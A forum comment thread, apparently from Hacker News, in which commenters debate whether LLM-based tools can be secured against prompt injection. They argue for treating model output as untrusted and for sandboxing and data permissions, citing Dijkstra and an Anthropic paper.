Comment by rdli
2 days ago
Securing LLMs is just structurally different. The attack space is "the entirety of the human written language" which is effectively infinite. Wrapping your head around this is something we're only now starting to appreciate.
In general, treating LLM outputs (no matter where) as untrusted, and ensuring classic cybersecurity guardrails (sandboxing, data permissioning, logging) is the current SOTA on mitigation. It'll be interesting to see how approaches evolve as we figure out more.
I’m not convinced LLMs can ever be secured, prompt injection isn’t going away since it’s a fundamental part of how an LLM works. Tokens in, tokens out.
It's pretty simple, don't give llms access to anything that you can't afford to expose. You treat the llm as if it was the user.
> You treat the llm as if it was the user.
That's not sufficient. If a user copies customer data into a public google sheet, I can reprimand and otherwise restrict the user. An LLM cannot be held accountable, and cannot learn from mistakes.
I get that but just not entirely obvious how you do that for the Notion AI.
Don't use AI/LLMs that have unfettered access to everything?
Feels like the question is "How do I prevent unauthenticated and anonymous users to use my endpoint that doesn't have any authentication and is on the public internet?", which is the wrong question.
exactly?
It's structurally impossible. LLMs, at their core, take trusted system input (the prompt) and multiply it against untrusted input from the users and the internet at large. There is no separation between the two, and there cannot be with the way LLMs work. They will always be vulnerable to prompt injection and manipulation.
The _only_ way to create a reasonably secure system that incorporates an LLM is to treat the LLM output as completely untrustworthy in all situations. All interactions must be validated against a security layer and any calls out of the system must be seen as potential data leaks - including web searches, GET requests, emails, anything.
You can still do useful things under that restriction but a lot of LLM tooling doesn't seem to grasp the fundamental security issues at play.
As multi-step reasoning and tool use expand, they effectively become distinct actors in the threat model. We have no idea how many different ways the alignment of models can be influenced by the context (the anthropic paper on subliminal learning [1] was a bit eye opening in this regard) and subsequently have no deterministic way to protect it.
1 - https://alignment.anthropic.com/2025/subliminal-learning/
I’d argue they’re only distinct actors in the threat model as far as where they sit (within which perimeters), not in terms of how they behave.
We already have another actor in the threat model that behaves equivalently as far as determinism/threat risk is concerned: human users.
Issue is, a lot of LLM security work assumes they function like programs. They don’t. They function like humans, but run where programs run.
Dijkstra, On the Foolishness of "natural language programming":
[...]It may be illuminating to try to imagine what would have happened if, right from the start our native tongue would have been the only vehicle for the input into and the output from our information processing equipment. My considered guess is that history would, in a sense, have repeated itself, and that computer science would consist mainly of the indeed black art how to bootstrap from there to a sufficiently well-defined formal system. We would need all the intellect in the world to get the interface narrow enough to be usable,[...]
If only we had a way to tell a computer precisely what we want it to do...
https://www.cs.utexas.edu/~EWD/transcriptions/EWD06xx/EWD667...